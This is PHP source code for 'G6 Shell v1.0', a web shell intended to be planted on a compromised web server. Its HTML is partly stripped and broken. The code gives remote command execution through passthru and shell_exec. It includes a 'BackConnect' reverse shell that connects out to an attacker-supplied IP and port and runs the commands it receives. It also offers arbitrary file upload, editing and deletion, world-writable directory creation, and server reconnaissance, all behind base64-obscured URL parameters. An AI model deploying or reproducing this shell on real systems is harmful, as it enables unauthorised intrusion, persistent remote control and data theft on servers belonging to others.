".$ShellTitle.""; function get_srv_info(){ echo "
G6 Shell v1.0 - Public"; echo "
Server Name: ".$_SERVER["SERVER_NAME"]."
Server IP: ".$_SERVER["SERVER_ADDR"]." [WHOIS] - [TRACEROUTE]
". "Shell Location: ".$_SERVER["SCRIPT_FILENAME"]."
Server Software: ".$_SERVER["SERVER_SOFTWARE"]." [Exploit DB]
"; echo "

"; } $upload = $_GET['dXBsb2Fk']; $downloadfilename = $_GET['ZG93bg']; $delete = $_GET['delete']; $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg']; $mkdir = $_GET['bWtkaXI']; $NavLinks = array( array( "name" => "Main", "url" => "?" ), array( "name" => "Server Information", "url" => "?c3J2aW5mbw=" ), array( "name" => "File Explorer", "url" => "?ZmlsZV9leHBsb3Jlcg=".dirname(__FILE__)."/" ), array( "name" => "Terminal", "url" => "?dGVybWlhbmw" ), array( "name" => "Hash Identifier", "url" => "?aGk=" ), array( "name" => "BackConnect", "url" => "?YmNrbmV0=" ), array( "name" => "Shell-101", "url" => "?a253aXN1ZQ" ) ); $CurrentUrl = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $last = count($NavLinks) - 1; foreach($NavLinks as $NavLink => $NavRow){ $linknames = ($NavLink == 0); $linkurls = ($NavLink == $last); echo ''.$NavRow['name'].' / '; } if(strstr($CurrentUrl, "readfile")){ $sourcefile = $_REQUEST['readfile']; if(is_file($sourcefile)){ get_srv_info(); if(isset($sourcefile)) { $Finalsource = file_get_contents($sourcefile); echo "

"; } }else{ echo "Data not sent."; } if(isset($_POST['save'])){ $new_source = $_POST['sourcecode']; $source_edit = fopen($sourcefile, 'w'); fwrite($source_edit, $new_source); fclose($source_edit); } }elseif(strstr($CurrentUrl, "LIa87yob")){ get_srv_info(); echo '
Url:
'; }elseif(strstr($CurrentUrl, "aGk")){ get_srv_info(); echo "

G6 hash identifier is able to identify MD5, SHA-1, MySQL5, DES(Unix), SHA-256, SHA-384, SHA-512, MD5(Unix), MD5(APR), MD5(phpBB3), MD5(Wordpress), SHA-256(Unix), SHA-512(Unix) and MD5(Base-64).

"; if(isset($_POST['gethash'])){ $hash = $_POST['hash']; if(strlen($hash)==32){ $hashresult == "MD5 Hash"; }elseif(strlen($hash)==40){ $hashresult = "SHA-1 Hash/ /MySQL5 Hash"; }elseif(strlen($hash)==13){ $hashresult = "DES(Unix) Hash"; }elseif(strlen($hash)==16){ $hashresult = "MySQL Hash / /DES(Oracle Hash)"; }elseif(strlen($hash)==41){ $GetHashChar = substr($hash, 40); if($GetHashChar == "*"){ $hashresult = "MySQL5 Hash"; } }elseif(strlen($hash)==64){ $hashresult = "SHA-256 Hash"; }elseif(strlen($hash)==96){ $hashresult = "SHA-384 Hash"; }elseif(strlen($hash)==128){ $hashresult = "SHA-512 Hash"; }elseif(strlen($hash)==34){ if(strstr($hash, '$1$')){ $hashresult = "MD5(Unix) Hash"; } }elseif(strlen($hash)==37){ if(strstr($hash, '$apr1$')){ $hashresult = "MD5(APR) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$H$')){ $hashresult = "MD5(phpBB3) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$P$')){ $hashresult = "MD5(Wordpress) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$5$')){ $hashresult = "SHA-256(Unix) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$6$')){ $hashresult = "SHA-512(Unix) Hash"; } }elseif(strlen($hash)==24){ if(strstr($hash, '==')){ $hashresult = "MD5(Base-64) Hash"; } }else{ $hashresult = "Hash type not found"; } }else{ $hashresult = "Not Hash Entered"; } echo '
Enter Hash:
Result: '.$hashresult.'
'; }elseif(strstr($CurrentUrl, "dXBsb2Fk")){ get_srv_info(); echo '

G6 File Uploader


'; echo '
Path:
'; if(isset($_FILES['file'])){ $errors = array(); $file_name = $_FILES['file']['name']; $file_tmp = $_FILES['file']['tmp_name']; if(empty($errors)){ if (move_uploaded_file($file_tmp, $_POST['path'].$file_name)){ echo "Upload Complete"; } } else { foreach($errors as $error){ echo $error.'
'; } } } }elseif(strstr($CurrentUrl, "YmNrbmV0")){ get_srv_info(); echo '

Back Connect

Back connect will allow you to enter system commands remotely.

IP Address:
Port:
'; if(isset($_POST['bind'])) { ini_set('max_execution_time', 0); echo "

Attempting Connection...

"; $ip = $_POST['ip']; $port= $_POST['port']; $sockfd=fsockopen($ip , $port , $errno, $errstr ); if($errno != 0) { echo "$errno : $errstr"; } else if (!$sockfd) { $result = "

Unexpected error has occured, connection may have failed.

"; } else { fputs ($sockfd , "\n{################################################################}\n ..:: G6 W3b Sh3ll v1.0- Coded By Mr. P-teo ::..\n\n => Backconnect \n => Back \n \n{################################################################}"); $pwd = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $time = Shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n"); while(!feof($sockfd)) { $cmdPrompt = '[G6]#:> '; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd); } } echo "

"; }elseif(strstr($CurrentUrl, "bWtmbA")){ get_srv_info(); echo "

If no file path is included it will be created within the same directory as the shell.

Filename:

"; $newfilename = htmlentities($_POST['newfilename']); if(isset($_POST['create'])){ $ourFileName = $newfilename; $ourFileHandle = fopen($ourFileName, 'w') or die("can't open file"); fclose($ourFileHandle); } echo "

Coded By Mr. P-teo

"; }elseif(strstr($CurrentUrl, "bWtkaXI")){ get_srv_info(); echo "

If no file path is included directory will be created within the same directory as the shell.

Directory Name:

"; $newdirname = htmlentities($_POST['newdirname']); if(isset($_POST['createdir'])){ $ourdirName = $newdirname; mkdir($ourdirName, 0777); echo "Directory Created!"; } echo "

Coded By Mr. P-teo

"; }elseif(strstr($CurrentUrl, "ZmlsZV9leHBsb3Jlcg")){ get_srv_info(); $upload = $file_explorer; echo '

'; if(isset($_POST['godir'])){ $mandircha = $_POST['chdir']; if($mandircha){ header("Location: ?ZmlsZV9leHBsb3Jlcg=".$_POST['chdir']); } } ?>

?".$perm.""; } $type = Filetype($filename); $mod = date("F j, g:i a", filemtime($filename)); $filesize = round(filesize($filename) / 1024, 2); if($file_explorer == $_SERVER['DOCUMENT_ROOT']."/"){ if($filename == ".."){ $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/")); echo ""; }elseif($filename == "."){ $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/")); echo ""; }else{ $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg']; echo ""; } }else{ if($filename == ".."){ $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/")); echo ""; }elseif($filename == "."){ $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/")); echo ""; }else{ $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg']; echo ""; } } } } ?>
FileName's Filetype Size Permisions Options
".$filename."
".$type."
".$filesize."Kb
".$perm."
".$filename."
".$type."
".$filesize."Kb
".$perm."
".$filename."
".$type."
".$filesize."Kb
".$perm."
edit | del |
".$filename."
".$type."
".$filesize."Kb
".$perm."
".$filename."
".$type."
".$filesize."Kb
".$perm."
".$filename."
".$type."
".$filesize."Kb
".$perm."
edit | del |


Coded By Mr. P-teo

[ON"; }else{ $s_safemode = "[OFF"; } if(extension_loaded('curl')){ $curls="[ON]"; }else{ $curls="[OFF]"; } echo " Server Port: ".$_SERVER['SERVER_PORT']."

HTTP Connection: ".$_SERVER['HTTP_CONNECTION']."

Operating System: ".php_uname()."

"; if(get_magic_quotes_gpc()){ echo "Magic Quotes: [ENABLED]

"; }else{ echo "Magic Quotes: [DISABLED]

"; } echo "PHP Version: ".phpversion()."

Safe Mode: ".$s_safemode."]

Curl: ".$curls."

Coded By Mr. P-teo

"; }elseif(strstr($CurrentUrl, "dGVybWlhbmw")){ get_srv_info(); //Needs more work. echo '
Command Execution:
'; $out = array(); passthru($_POST['command'], $out); foreach ($out as $line) { echo "$line\n"; } echo '

Coded By Mr. P-teo

'; }elseif(strstr($CurrentUrl, "a253aXN1ZQ")){ get_srv_info(); echo "

Information

G6 Shell v1.0 Open Beta Edition - coded by Mr. P-teo, below are the known issues and bugs.

  • Delete Directory With Contents.
  • When opening large files can run out of memory.
  • Create File/Dir requires directory path.
  • Editing can run into trouble with GET Method Not Implemented error.
  • Doesn't display contents of /home/ directory, needs url manipulation to get to the root folder.



Coded By Mr. P-teo

"; }else{ get_srv_info(); echo "



Public Shell Coded By Mr. P-teo



Coded By Mr. P-teo

"; } ob_flush() ?>